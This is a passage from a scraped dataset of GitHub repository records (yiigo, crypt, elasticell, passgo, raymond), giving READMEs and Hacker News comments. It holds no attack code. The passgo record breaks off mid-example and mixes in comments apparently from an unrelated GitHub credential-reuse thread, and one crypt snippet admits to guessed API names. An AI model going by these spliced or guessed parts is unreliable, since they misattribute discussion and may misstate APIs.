io.Copy(w, f); err != nil {\n return err\n }\n\n return nil\n }),\n)\n\nyiigo.HTTPUpload(context.Background(), \"URL\", form)\n```\n\n#### 
SQL Builder\n\n> \ud83d\ude0a \u4e3a\u4e0d\u60f3\u624b\u5199SQL\u7684\u4f60\u751f\u6210SQL\u8bed\u53e5\uff0c\u7528\u4e8e `sqlx` \u7684\u76f8\u5173\u65b9\u6cd5\uff1b\n>\n> \u26a0\ufe0f \u4f5c\u4e3a\u8f85\u52a9\u65b9\u6cd5\uff0c\u76ee\u524d\u652f\u6301\u7684\u7279\u6027\u6709\u9650\uff0c\u590d\u6742\u7684SQL\uff08\u5982\uff1a\u5b50\u67e5\u8be2\u7b49\uff09\u8fd8\u9700\u81ea\u5df1\u624b\u5199\n\n```go\nbuilder := yiigo.NewMySQLBuilder()\n// builder := yiigo.NewSQLBuilder(yiigo.MySQL)\n```\n\n- Query\n\n```go\nctx := context.Background()\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"id = ?\", 1),\n).ToQuery(ctx)\n// SELECT * FROM user WHERE id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"name = ? AND age > ?\", \"shenghui0779\", 20),\n).ToQuery(ctx)\n// SELECT * FROM user WHERE name = ? AND age > ?\n// [shenghui0779 20]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.WhereIn(\"age IN (?)\", []int{20, 30}),\n).ToQuery(ctx)\n// SELECT * FROM user WHERE age IN (?, ?)\n// [20 30]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Select(\"id\", \"name\", \"age\"),\n yiigo.Where(\"id = ?\", 1),\n).ToQuery(ctx)\n// SELECT id, name, age FROM user WHERE id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Distinct(\"name\"),\n yiigo.Where(\"id = ?\", 1),\n).ToQuery(ctx)\n// SELECT DISTINCT name FROM user WHERE id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.LeftJoin(\"address\", \"user.id = address.user_id\"),\n yiigo.Where(\"user.id = ?\", 1),\n).ToQuery(ctx)\n// SELECT * FROM user LEFT JOIN address ON user.id = address.user_id WHERE user.id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"address\"),\n yiigo.Select(\"user_id\", \"COUNT(*) AS total\"),\n yiigo.GroupBy(\"user_id\"),\n yiigo.Having(\"user_id = ?\", 1),\n).ToQuery(ctx)\n// SELECT user_id, COUNT(*) AS total FROM address GROUP BY user_id HAVING user_id = ?\n// [1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"age > ?\", 20),\n yiigo.OrderBy(\"age ASC\", \"id DESC\"),\n yiigo.Offset(5),\n yiigo.Limit(10),\n).ToQuery(ctx)\n// SELECT * FROM user WHERE age > ? ORDER BY age ASC, id DESC LIMIT ? OFFSET ?\n// [20, 10, 5]\n\nwrap1 := builder.Wrap(\n Table(\"user_1\"),\n Where(\"id = ?\", 2),\n)\n\nbuilder.Wrap(\n Table(\"user_0\"),\n Where(\"id = ?\", 1),\n Union(wrap1),\n).ToQuery(ctx)\n// (SELECT * FROM user_0 WHERE id = ?) UNION (SELECT * FROM user_1 WHERE id = ?)\n// [1, 2]\n\nbuilder.Wrap(\n Table(\"user_0\"),\n Where(\"id = ?\", 1),\n UnionAll(wrap1),\n).ToQuery(ctx)\n// (SELECT * FROM user_0 WHERE id = ?) UNION ALL (SELECT * FROM user_1 WHERE id = ?)\n// [1, 2]\n\nbuilder.Wrap(\n Table(\"user_0\"),\n WhereIn(\"age IN (?)\", []int{10, 20}),\n Limit(5),\n Union(\n builder.Wrap(\n Table(\"user_1\"),\n Where(\"age IN (?)\", []int{30, 40}),\n Limit(5),\n ),\n ),\n).ToQuery(ctx)\n// (SELECT * FROM user_0 WHERE age IN (?, ?) LIMIT ?) UNION (SELECT * FROM user_1 WHERE age IN (?, ?) 
LIMIT ?)\n// [10, 20, 5, 30, 40, 5]\n```\n\n- Insert\n\n```go\nctx := context.Background()\n\ntype User struct {\n ID int `db:\"-\"`\n Name string `db:\"name\"`\n Age int `db:\"age\"`\n Phone string `db:\"phone,omitempty\"`\n}\n\nbuilder.Wrap(Table(\"user\")).ToInsert(ctx, &User{\n Name: \"yiigo\",\n Age: 29,\n})\n// INSERT INTO user (name, age) VALUES (?, ?)\n// [yiigo 29]\n\nbuilder.Wrap(yiigo.Table(\"user\")).ToInsert(ctx, yiigo.X{\n \"name\": \"yiigo\",\n \"age\": 29,\n})\n// INSERT INTO user (name, age) VALUES (?, ?)\n// [yiigo 29]\n```\n\n- Batch Insert\n\n```go\nctx := context.Background()\n\ntype User struct {\n ID int `db:\"-\"`\n Name string `db:\"name\"`\n Age int `db:\"age\"`\n Phone string `db:\"phone,omitempty\"`\n}\n\nbuilder.Wrap(Table(\"user\")).ToBatchInsert(ctx, []*User{\n {\n Name: \"shenghui0779\",\n Age: 20,\n },\n {\n Name: \"yiigo\",\n Age: 29,\n },\n})\n// INSERT INTO user (name, age) VALUES (?, ?), (?, ?)\n// [shenghui0779 20 yiigo 29]\n\nbuilder.Wrap(yiigo.Table(\"user\")).ToBatchInsert(ctx, []yiigo.X{\n {\n \"name\": \"shenghui0779\",\n \"age\": 20,\n },\n {\n \"name\": \"yiigo\",\n \"age\": 29,\n },\n})\n// INSERT INTO user (name, age) VALUES (?, ?), (?, ?)\n// [shenghui0779 20 yiigo 29]\n```\n\n- Update\n\n```go\nctx := context.Background()\n\ntype User struct {\n Name string `db:\"name\"`\n Age int `db:\"age\"`\n Phone string `db:\"phone,omitempty\"`\n}\n\nbuilder.Wrap(\n Table(\"user\"),\n Where(\"id = ?\", 1),\n).ToUpdate(ctx, &User{\n Name: \"yiigo\",\n Age: 29,\n})\n// UPDATE user SET name = ?, age = ? WHERE id = ?\n// [yiigo 29 1]\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"id = ?\", 1),\n).ToUpdate(ctx, yiigo.X{\n \"name\": \"yiigo\",\n \"age\": 29,\n})\n// UPDATE user SET name = ?, age = ? WHERE id = ?\n// [yiigo 29 1]\n\nbuilder.Wrap(\n yiigo.Table(\"product\"),\n yiigo.Where(\"id = ?\", 1),\n).ToUpdate(ctx, yiigo.X{\n \"price\": yiigo.Clause(\"price * ? + ?\", 2, 100),\n})\n// UPDATE product SET price = price * ? + ? WHERE id = ?\n// [2 100 1]\n```\n\n- Delete\n\n```go\nctx := context.Background()\n\nbuilder.Wrap(\n yiigo.Table(\"user\"),\n yiigo.Where(\"id = ?\", 1),\n).ToDelete(ctx)\n// DELETE FROM user WHERE id = ?\n// [1]\n\nbuilder.Wrap(Table(\"user\")).ToTruncate(ctx)\n// TRUNCATE user\n```\n\n## Documentation\n\n- [API Reference](https://pkg.go.dev/github.com/shenghui0779/yiigo)\n- [Example](https://github.com/shenghui0779/tplgo)\n\n**Enjoy \ud83d\ude0a**\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xordataexchange/crypt", "link": "https://github.com/xordataexchange/crypt", "tags": [], "stars": 513, "description": "Store and retrieve encrypted configs from etcd or consul", "lang": "Go", "repo_lang": "", "readme": "# crypt\n\nYou can use crypt as a command line tool or as a configuration library:\n\n* [crypt cli](bin/crypt)\n* [crypt/config](config)\n\n## Demo\n\nWatch Kelsey explain `crypt` in this quick 5 minute video:\n\n[![Crypt Demonstration Video](https://img.youtube.com/vi/zYpqqfuGwW8/0.jpg)](https://www.youtube.com/watch?v=zYpqqfuGwW8)\n\n## Generating gpg keys and keyrings\n\nThe crypt cli and config package require gpg keyrings. 
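Once a keyring exists (see the next section for how to create one), the `config` package can use the secret keyring to transparently decrypt values read from etcd or consul. The snippet below is only a sketch: the constructor name and signatures are assumptions from memory and should be checked against the `config` package's godoc before use.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"os\"\n\n\t\"github.com/xordataexchange/crypt/config\"\n)\n\nfunc main() {\n\t// open the secret keyring generated with gpg2 (path is an example)\n\tkr, err := os.Open(\".secring.gpg\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer kr.Close()\n\n\t// NewStandardEtcdConfigManager is assumed here; verify the exact name in the godoc\n\tcm, err := config.NewStandardEtcdConfigManager([]string{\"http://127.0.0.1:4001\"}, kr)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tvalue, err := cm.Get(\"/app/config\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Printf(\"%s\\n\", value)\n}\n```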
\n\n### Create a key and keyring from a batch file\n\n```\nvim app.batch\n```\n\n```\n%echo Generating a configuration OpenPGP key\nKey-Type: default\nSubkey-Type: default\nName-Real: app\nName-Comment: app configuration key\nName-Email: app@example.com\nExpire-Date: 0\n%pubring .pubring.gpg\n%secring .secring.gpg\n%commit\n%echo done\n```\n\nRun the following command:\n\n```\ngpg2 --batch --armor --gen-key app.batch\n```\n\nYou should now have two keyrings, `.pubring.gpg` which contains the public keys, and `.secring.gpg` which contains the private keys.\n\n> Note the private key is not protected by a passphrase.\n", "readme_type": "markdown", "hn_comments": "I had always wondered how these service discovery tools handled the encryption of data you put in them. I guess now I know! :)Before this was created were people just doing an encrypt/decrypt on in/out in their application code?Awesome project, thanks for sharing.Looks like it takes a similar approach as the hiera eyaml project (it also encrypts on a per-key basis using gpg) which I've found to be really nice to work with in the past (as opposed to other tools that use symmetric encryption or encrypt the entire blob of all secret keys together). Glad to see a tool that does this with etcd and consul, gives the same benefits without a centralized puppetmaster.Any plans for clients in other languages? Or if you're not planning to build would you accept PR's for them?Another great and needed product written in Go. Nice work!!This is interesting, I'm happy that the tool be available as a library.As another point of reference an HTTP load balancer that mailgun built and uses, called vulcan[1], uses secretbox[2] to encrypt secrets into etcd. There are no good docs on how to use this in practice with vulcanctl so I will need need to ask them to document that :)[1] https://github.com/mailgun/vulcand[2] http://godoc.org/code.google.com/p/go.crypto/nacl/secretbox\"After encryption it is gzipped\" is a red flag. After encryption it should be noise, why try to compress it?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "deepfabric/elasticell", "link": "https://github.com/deepfabric/elasticell", "tags": ["raft", "distributed-systems", "distributed-database", "redis", "golang", "key-value"], "stars": 513, "description": "Elastic Key-Value Storage With Strong Consistency and Reliability", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/deepfabric/elasticell.svg?branch=master)](https://travis-ci.org/deepfabric/elasticell)\r\n[![Go Report Card](https://goreportcard.com/badge/github.com/deepfabric/elasticell)](https://goreportcard.com/report/github.com/deepfabric/elasticell)\r\n![Project Status](https://img.shields.io/badge/status-alpha-yellow.svg)\r\n\r\n## What is Elasticell?\r\n\r\nElasticell is a distributed NoSQL database with strong consistency and reliability.\r\n\r\n- __Compatible with Redis protocol__\r\nUse Elasticell as Redis. You can replace Redis with Elasticell to power your application without changing a single line of code in most cases([unsupport-redis-commands](./docs/unsupport-command.md)).\r\n\r\n- __Horizontal scalability__\r\nGrow Elasticell as your business grows. You can increase the capacity simply by adding more machines.\r\n\r\n- __Strong consistent persistence storage__\r\nElasticell put your data on multiple machines as replication without worrying about consistency. 
Elasticell makes your application use redis as a database and not just only the cache.\r\n\r\n- __High availability__\r\nAll of the three components, PD, Cell and Proxy, can tolerate the failure of some instances without impacting the availability of the entire cluster.\r\n\r\n\r\n## Roadmap\r\n\r\nRead the [Roadmap](./docs/ROADMAP.md).\r\n\r\n## Quick start\r\n\r\nRead the [Quick Start](./docs/user-guide/quick-start.md)\r\n\r\n## Documentation\r\n\r\n+ [English](http://elasticell.readthedocs.io/en/latest/)\r\n+ [\u7b80\u4f53\u4e2d\u6587](http://elasticell.readthedocs.io/zh/latest/)\r\n\r\n## Architecture\r\n\r\n![architecture](./docs/imgs/architecture.png)\r\n\r\n## Contributing\r\n\r\nTODO\r\n\r\n## License\r\n\r\nElasticell is under the Apache 2.0 license. See the [LICENSE](./LICENSE) file for details.\r\n\r\n## Acknowledgments\r\n\r\n- Thanks [etcd](https://github.com/coreos/etcd) for providing the raft implementation.\r\n- Thanks [tidb](https://github.com/pingcap/tidb) for providing the multi-raft implementation.\r\n- Thanks [RocksDB](https://github.com/facebook/rocksdb) for their powerful storage engines.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ejcx/passgo", "link": "https://github.com/ejcx/passgo", "tags": ["password-vault", "passgo", "golang"], "stars": 513, "description": "Simple golang password manager.", "lang": "Go", "repo_lang": "", "readme": "# passgo\nstores, retrieves, generates, and synchronizes passwords and files securely and is written in Go! It is inspired by https://passwordstore.org but has a few key differences. The most important difference is passgo is not GPG based. Instead it uses a master password to securely store your passwords. It also supports encrypting arbitrary files.\n\n\n\npassgo is meant to be secure enough that you can publicly post your vault. I've started publishing my passwords [here](https://github.com/ejcx/passwords.git).\n\n## Installation\n\n`passgo` requires Go version 1.11 or later.\n\n```bash\n(cd; GO111MODULE=on go install github.com/ejcx/passgo/v2)\n```\n\n## Getting started with passgo\n\nCreate a vault and specify the directory to store passwords in. You will be prompted for your master password:\n\n```bash\n$ passgo init\nPlease enter a strong master password:\n2019/02/23 16:54:31 Created directory to store passwords: ~/.passgo\n```\n\nFinally, to learn more you can either read about the commands listed in this README or run:\n\n```bash\npassgo help\n```\n\nThe `--help` argument can be used on any subcommand to describe it and see documentation or examples.\n\n## Configuring passgo\nThe `PASSGODIR` environment variable specifies the directory that your vault is in.\n\nI store my vault in the default location `~/.passgo`. All subcommands will respect this environment variable, including `init`\n\n\n## COMMANDS\n\n### Listing Passwords\n```\n$ passgo\n\u251c\u2500\u2500money\n| \u2514\u2500\u2500mint.com\n\u2514\u2500\u2500another\n \u2514\u2500\u2500another.com\n```\n\nThis basic command is used to print out the contents of your password vault. It doesn't require you to enter your master password.\n\n\n### Initializing Vault\n```\n$ passgo init\n```\nInit should only be run one time, before running any other command. It is used for generating your master public private keypair.\n\nBy default, passgo will create your password vault in the `.passgo` directory within your home directory. 
You can override this location using the `PASSGODIR` environment variable.\n\n\n\n### Inserting a password\n```\n$ passgo insert money/mint.com\nEnter password for money/mint.com: \n```\n\nInserting a password in to your vault is easy. If you wish to group multiple entries together, it can be accomplished by prepending a group name followed by a slash to the pass-name. \n\nHere we are adding mint.com to the password store within the money group.\n\n\n### Inserting a file\n```\n$ passgo insert money/budget.csv budget.csv\n```\n\nAdding a file works almost the same as insert. Instead it has an extra argument. The file that you want to add to your vault is the final argument. \n\n\n### Retrieving a password\n```\n$ passgo show money/mint.com\nEnter master password:\ndolladollabills$$1\n```\n\nShow is used to display a password in standard out.\n\n\t\n### Rename a password\n```\n$ passgo rename mney/mint.com\nEnter new site name for mney/mint.com: money/mint.com\n```\n\nIf a password is added with the wrong name it can be updated later. Here we rename our mint.com site after misspelling the group name.\n\n\n### Updating a password\n```\n$ passgo edit money/mint.com\nEnter new password for money/mint.com:\n```\n\nIf you want to securely update a password for an already existing site, the edit command is helpful.\n\n\n\n### Generating a password\n```\n$ passgo generate\n%L4^!s,Rry!}s:UPasswords became hard to manage... now you have to choose >>different<< password for every site... Who can remember all those passwords? Only a password manager...Related to password security: any of you guys using Chrome's ability to sync passwords to \"Google cloud\"?I just started using it a few weeks ago. Supposedly it uses a password to encrypt the data, but I still don't feel too confident syncing them there. On the other hand.. damn it's so convenient between multiple devices.I got an email from Bitbucket earlier today warning me about unusual behavior on my account as a result of reused credentials. Is it an attack across several version-control services?just a random tidbit.. but the system currently allows you to set your password to what you previously hadThis is far better than TeamViewer's response to the same threat lately.What the page doesn't tell me is: What is their definition of an \"affected\" account?Obviously one where an attempt was made, and succeeded, would count as affected.But would an account where an attempt was made, and failed, also count?What if the userid and password are correct, but 2FA stopped the attack on an account. Is that account affected, in their view?I hadn't noticed that Github started supporting U2F. Nice to finally use my keys for something other than Google accounts.\"We immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\"I feel like sites should somehow preemptively disable passwords that have leaked publically. Is there a simple way for them to do so without downloading every leak themself? Is there a simple way for whitehats to help out? Whitehat means you can't test the site without their permission, but someone could have a database that they provide partial access to for sites without leaking and spreading it further themself?Here's an idea I just thought of: sites should have a standardized, secondary place to log in, where if the login is correct it automatically disables the password and requires a reset. \"Report a compromised account\", as it were. 
Anyone (or maybe specific whitehat groups) should have explicit permission to try any logins they want there: after all, if they succeed in logging in then the right thing happens and the account is locked. It's impossible to gain any illicit advantage from such access because any correct credentials are locked as soon as you try them. (Is this assumption robust?) So whitehats could then take lists and throw them against sites that implement this standard, but no attackers can gain from this.The only problem I see is that disabling rate limits would open you to DOS (also if multiple people use the same list, although better coordination would help solve that): maybe allow bulk uploads which take less bandwidth overall.Does this idea have any value?I received this e-mail and had my password reset by Github. Based on the \"security history\" shown in my Github account's setting page, my account wasn't compromised as there was no login activity during the past week.I'm thinking that this is fallout from the LinkedIn breach, because this is the first high-profile breach which includes one of my e-mail addresses. (How do I know this? I'm using haveibeenpwned.com -- a free service that I highly suggest registering with.)Anecdote: I use an email account and a relatively simple password (3 relatively common words together) on LinkedIn. I don't use that email account much, but it was affected by the Linkedin hack. Today I get an email saying my Twitter account was accessed suspiciously (same credentials).Power of the network effect that I won't leave Linkedin, and wouldn't think twice before spending money on the platform if I needed to recruit someone or do b2b sales. But screw Linkedin for not taking proper precautions.> The most important difference is passgo is not GPG based. Instead it uses a master password to securely store your passwords.\"Instead\" here seems to imply that GPG cannot securely store data in a password-protected file, which it can. (See the --symmetric option.)It just simply uses a library, and perhaps a custom serialization format / a different format from what GPG uses.One of the reasons why I encrypt my keyring with GPG (and I use a tool that uses/wraps GPG) is because I can recover the keyring then with only GPG: I don't need the actual keyring program, just GPG and the password.Yay a password manager I might actually use, very impressed so far.When I use passgo, how do I collect my $200?edit: Now that I've read the commit message; :(A neat idea, but then I think wouldn't it be clever to introduce such a tool with a backdoor, and then convince people to use it to store their passwords publicly? I'm not accusing this project of anything nefarious, but bugs happen, and a security review wouldn't be a bad idea. Not to mention some unit tests, maybe? :)I'm still on the fence about password managers. I always worry that I'll end up on a computer without my passwords and not be able to logon.Seems interesting but why not to use GPG?Very nice. I like the key feature being that your encrypted vault can be publicly posted. In a team environment, does it make sense to share the master password with all team members? 
Or is passgo designed for just the individual in mind?I have been looking at https://www.vaultproject.io for team credential storage and sharing.Shameless self plug: https://github.com/creshal/yspavePassword manager that is actually safe against attackers with access to your data at rest by encrypting everything (with authentication), including metadata.Why aren't the site names encrypted too?Users are encouraged to store their password files publicly, and yet the files contain a plaintext list of sites that the user has logins to!Seems a serious privacy breach.As a Go developer, I'm curious. Why is it that whenever a project built in Go is submitted to HN, the title mentions that it's built in Go? What makes the language special that it's worth mentioning?I've been using `pass` for the past few years (I wrote a post on setting it up on OSX which has been fairly popular [0]). However last month I switched to 1Password (I signed up to the family plan trial - I'm not set on it though).The main thing I like about 1Password is the browser integration. It just makes life so much easier being able to click a button and have the password automatically entered into the form. I have a script ([1] - should be easy to adapt for this) which would poll Chrome for the current URL, decrypt or generate the password, and copy it to the clipboard - but clicking a button is a lot less friction.1Password also has a xkcd-style password generator option, which is great for things like Netflix that you need to type in on TVs and such.The main reason why I signed up for 1Password was so I could use it with my family, but the browser extensions only work on OS X 10.10+, so that rules out 2/3 family members (who run Windows 10 and OS X 10.6). You can access the passwords online, but it's no way near as user friendly. If anyone has a good recommendation of an alternative (I'd prefer open source), let me know![0] http://www.stackednotion.com/blog/2012/09/10/setting-up-pass...[1] https://github.com/lucaspiller/passosxSimple alternative: storing passwords in gpg encrypted files and using emacs.Emacs has EasyPG so when you create a file with .gpg extension and try to save it prompts you for a password to encrypt this file with. Similarly if you open a .gpg file it asks you for a password for decrypting it. This way your only dependency is emacs and you can store passwords file wherever you like. And you don't expose names of sites you need passwords for.The code looks very clean and well organized. It appears to be doing things as simply and correctly as possible.A 5 minute glance through the code didn't reveal any vulnerabilities. That's a better result than most.For newbies, it would be helpful to explain how to retrieve the encrypted password, aka ./passgo www.example.com. 
Didn't see it listed on the help and github page.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "aymerick/raymond", "link": "https://github.com/aymerick/raymond", "tags": ["go", "handlebars"], "stars": 513, "description": "Handlebars for golang", "lang": "Go", "repo_lang": "", "readme": "# raymond [![Build Status](https://secure.travis-ci.org/aymerick/raymond.svg?branch=master)](http://travis-ci.org/aymerick/raymond) [![GoDoc](https://godoc.org/github.com/aymerick/raymond?status.svg)](http://godoc.org/github.com/aymerick/raymond)\n\nHandlebars for [golang](https://golang.org) with the same features as [handlebars.js](http://handlebarsjs.com) `3.0`.\n\nThe full API documentation is available here: .\n\n![Raymond Logo](https://github.com/aymerick/raymond/blob/master/raymond.png?raw=true \"Raymond\")\n\n\n# Table of Contents\n\n- [Quick Start](#quick-start)\n- [Correct Usage](#correct-usage)\n- [Context](#context)\n- [HTML Escaping](#html-escaping)\n- [Helpers](#helpers)\n - [Template Helpers](#template-helpers)\n - [Built-In Helpers](#built-in-helpers)\n - [The `if` block helper](#the-if-block-helper)\n - [The `unless` block helper](#the-unless-block-helper)\n - [The `each` block helper](#the-each-block-helper)\n - [The `with` block helper](#the-with-block-helper)\n - [The `lookup` helper](#the-lookup-helper)\n - [The `log` helper](#the-log-helper)\n - [The `equal` helper](#the-equal-helper)\n - [Block Helpers](#block-helpers)\n - [Block Evaluation](#block-evaluation)\n - [Conditional](#conditional)\n - [Else Block Evaluation](#else-block-evaluation)\n - [Block Parameters](#block-parameters)\n - [Helper Parameters](#helper-parameters)\n - [Automatic conversion](#automatic-conversion)\n - [Options Argument](#options-argument)\n - [Context Values](#context-values)\n - [Helper Hash Arguments](#helper-hash-arguments)\n - [Private Data](#private-data)\n - [Utilites](#utilites)\n - [`Str()`](#str)\n - [`IsTrue()`](#istrue)\n- [Context Functions](#context-functions)\n- [Partials](#partials)\n - [Template Partials](#template-partials)\n - [Global Partials](#global-partials)\n - [Dynamic Partials](#dynamic-partials)\n - [Partial Contexts](#partial-contexts)\n - [Partial Parameters](#partial-parameters)\n- [Utility Functions](#utility-functions)\n- [Mustache](#mustache)\n- [Limitations](#limitations)\n- [Handlebars Lexer](#handlebars-lexer)\n- [Handlebars Parser](#handlebars-parser)\n- [Test](#test)\n- [References](#references)\n- [Others Implementations](#others-implementations)\n\n\n## Quick Start\n\n $ go get github.com/aymerick/raymond\n\nThe quick and dirty way of rendering a handlebars template:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond\"\n)\n\nfunc main() {\n tpl := `
<div class=\"entry\">\n  <h1>{{title}}</h1>\n  <div class=\"body\">\n    {{body}}\n  </div>\n</div>
\n`\n\n ctx := map[string]string{\n \"title\": \"My New Post\",\n \"body\": \"This is my first post!\",\n }\n\n result, err := raymond.Render(tpl, ctx)\n if err != nil {\n panic(\"Please report a bug :)\")\n }\n\n fmt.Print(result)\n}\n```\n\nDisplays:\n\n```html\n
<div class=\"entry\">\n  <h1>My New Post</h1>\n  <div class=\"body\">\n    This is my first post!\n  </div>\n</div>
\n```\n\nPlease note that the template will be parsed everytime you call `Render()` function. So you probably want to read the next section.\n\n\n## Correct Usage\n\nTo avoid parsing a template several times, use the `Parse()` and `Exec()` functions:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond\"\n)\n\nfunc main() {\n source := `
<div class=\"entry\">\n  <h1>{{title}}</h1>\n  <div class=\"body\">\n    {{body}}\n  </div>\n</div>
\n`\n\n ctxList := []map[string]string{\n {\n \"title\": \"My New Post\",\n \"body\": \"This is my first post!\",\n },\n {\n \"title\": \"Here is another post\",\n \"body\": \"This is my second post!\",\n },\n }\n\n // parse template\n tpl, err := raymond.Parse(source)\n if err != nil {\n panic(err)\n }\n\n for _, ctx := range ctxList {\n // render template\n result, err := tpl.Exec(ctx)\n if err != nil {\n panic(err)\n }\n\n fmt.Print(result)\n }\n}\n\n```\n\nDisplays:\n\n```html\n
<div class=\"entry\">\n  <h1>My New Post</h1>\n  <div class=\"body\">\n    This is my first post!\n  </div>\n</div>\n<div class=\"entry\">\n  <h1>Here is another post</h1>\n  <div class=\"body\">\n    This is my second post!\n  </div>\n</div>
\n```\n\nYou can use `MustParse()` and `MustExec()` functions if you don't want to deal with errors:\n\n```go\n// parse template\ntpl := raymond.MustParse(source)\n\n// render template\nresult := tpl.MustExec(ctx)\n```\n\n\n## Context\n\nThe rendering context can contain any type of values, including `array`, `slice`, `map`, `struct` and `func`.\n\nWhen using structs, be warned that only exported fields are accessible. However you can access exported fields in template with their lowercase names. For example, both `{{author.firstName}}` and `{{Author.FirstName}}` references give the same result, as long as `Author` and `FirstName` are exported struct fields.\n\nMore, you can use the `handlebars` struct tag to specify a template variable name different from the struct field name.\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond\"\n)\n\nfunc main() {\n source := `
<div class=\"post\">\n  <h1>By {{author.firstName}} {{author.lastName}}</h1>\n  <div class=\"body\">{{body}}</div>\n\n  <h1>Comments</h1>\n\n  {{#each comments}}\n  <h2>By {{author.firstName}} {{author.lastName}}</h2>\n  <div class=\"body\">{{content}}</div>\n  {{/each}}\n</div>
`\n\n type Person struct {\n FirstName string\n LastName string\n }\n\n type Comment struct {\n Author Person\n Body string `handlebars:\"content\"`\n }\n\n type Post struct {\n Author Person\n Body string\n Comments []Comment\n }\n\n ctx := Post{\n Person{\"Jean\", \"Valjean\"},\n \"Life is difficult\",\n []Comment{\n Comment{\n Person{\"Marcel\", \"Beliveau\"},\n \"LOL!\",\n },\n },\n }\n\n output := raymond.MustRender(source, ctx)\n\n fmt.Print(output)\n}\n```\n\nOutput:\n\n```html\n
<div class=\"post\">\n  <h1>By Jean Valjean</h1>\n  <div class=\"body\">Life is difficult</div>\n\n  <h1>Comments</h1>\n\n  <h2>By Marcel Beliveau</h2>\n  <div class=\"body\">LOL!</div>\n</div>
\n```\n\n## HTML Escaping\n\nBy default, the result of a mustache expression is HTML escaped. Use the triple mustache `{{{` to output unescaped values.\n\n```go\nsource := `
<div class=\"entry\">\n  <h1>{{title}}</h1>\n  <div class=\"body\">\n    {{{body}}}\n  </div>\n</div>
\n`\n\nctx := map[string]string{\n \"title\": \"All about

Tags\",\n \"body\": \"

This is a post about <p> tags

\",\n}\n\ntpl := raymond.MustParse(source)\nresult := tpl.MustExec(ctx)\n\nfmt.Print(result)\n```\n\nOutput:\n\n```html\n
<div class=\"entry\">\n  <h1>All about &lt;p&gt; Tags</h1>\n  <div class=\"body\">\n    <p>This is a post about &lt;p&gt; tags</p>\n  </div>\n</div>
\n```\n\nWhen returning HTML from a helper, you should return a `SafeString` if you don't want it to be escaped by default. When using `SafeString` all unknown or unsafe data should be manually escaped with the `Escape` method.\n\n```go\nraymond.RegisterHelper(\"link\", func(url, text string) raymond.SafeString {\n return raymond.SafeString(\"<a href='\" + url + \"'>\" + raymond.Escape(text) + \"</a>\")\n})\n\ntpl := raymond.MustParse(\"{{link url text}}\")\n\nctx := map[string]string{\n \"url\": \"http://www.aymerick.com/\",\n \"text\": \"This is a <em>cool</em> website\",\n}\n\nresult := tpl.MustExec(ctx)\nfmt.Print(result)\n```\n\nOutput:\n\n```html\n<a href='http://www.aymerick.com/'>This is a &lt;em&gt;cool&lt;/em&gt; website</a>\n```\n\n\n## Helpers\n\nHelpers can be accessed from any context in a template. You can register a helper with the `RegisterHelper` function.\n\nFor example:\n\n```html\n
<div class=\"post\">\n  <h1>By {{fullName author}}</h1>\n  <div class=\"body\">{{body}}</div>\n\n  <h1>Comments</h1>\n\n  {{#each comments}}\n  <h2>By {{fullName author}}</h2>\n  <div class=\"body\">{{body}}</div>\n  {{/each}}\n</div>
\n```\n\nWith this context and helper:\n\n```go\nctx := map[string]interface{}{\n \"author\": map[string]string{\"firstName\": \"Jean\", \"lastName\": \"Valjean\"},\n \"body\": \"Life is difficult\",\n \"comments\": []map[string]interface{}{{\n \"author\": map[string]string{\"firstName\": \"Marcel\", \"lastName\": \"Beliveau\"},\n \"body\": \"LOL!\",\n }},\n}\n\nraymond.RegisterHelper(\"fullName\", func(person map[string]string) string {\n return person[\"firstName\"] + \" \" + person[\"lastName\"]\n})\n```\n\nOutputs:\n\n```html\n
<div class=\"post\">\n  <h1>By Jean Valjean</h1>\n  <div class=\"body\">Life is difficult</div>\n\n  <h1>Comments</h1>\n\n  <h2>By Marcel Beliveau</h2>\n  <div class=\"body\">LOL!</div>\n</div>
\n```\n\nHelper arguments can be any type.\n\nThe following example uses structs instead of maps and produces the same output as the previous one:\n\n```html\n
<div class=\"post\">\n  <h1>By {{fullName author}}</h1>\n  <div class=\"body\">{{body}}</div>\n\n  <h1>Comments</h1>\n\n  {{#each comments}}\n  <h2>By {{fullName author}}</h2>\n  <div class=\"body\">{{body}}</div>\n  {{/each}}\n</div>
